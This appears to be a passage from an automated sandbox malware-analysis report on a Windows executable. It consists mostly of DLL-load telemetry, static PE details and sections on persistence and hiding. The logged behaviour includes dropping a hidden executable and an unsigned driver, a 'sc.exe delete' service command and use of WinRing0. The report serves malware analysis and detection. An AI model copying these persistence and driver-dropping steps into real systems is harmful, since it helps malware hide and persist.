            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: 12Jh49DCAj.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: 12Jh49DCAj.exeStatic file information: File size 2630144 > 1048576
            Source: 12Jh49DCAj.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x277a00
            Source: 12Jh49DCAj.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: jjlazghkkuth.exe, 00000018.00000003.2166278619.00000209695D0000.00000004.00000001.00020000.00000000.sdmp
            Source: 12Jh49DCAj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 12Jh49DCAj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 12Jh49DCAj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 12Jh49DCAj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 12Jh49DCAj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: 12Jh49DCAj.exeStatic PE information: section name: .00cfg
            Source: jjlazghkkuth.exe.0.drStatic PE information: section name: .00cfg
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeCode function: 0_2_00007FF6C5321394 push qword ptr [00007FF6C532B004h]; ret 0_2_00007FF6C5321403
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeCode function: 24_2_00007FF759BF1394 push qword ptr [00007FF759BFB004h]; ret 24_2_00007FF759BF1403
            Source: C:\Windows\System32\conhost.exeCode function: 36_2_0000000140001394 push qword ptr [0000000140009004h]; ret 36_2_0000000140001403

            Persistence and Installation Behavior

            barindex
            Sample is not signed and drops a device driver
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeFile created: C:\Windows\TEMP\ovabrjmyzhdo.sysJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeFile created: C:\Windows\Temp\ovabrjmyzhdo.sysJump to dropped file
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeFile created: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeJump to dropped file
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeFile created: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeJump to dropped file
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeFile created: C:\Windows\Temp\ovabrjmyzhdo.sysJump to dropped file
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "ODTUTVYC"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
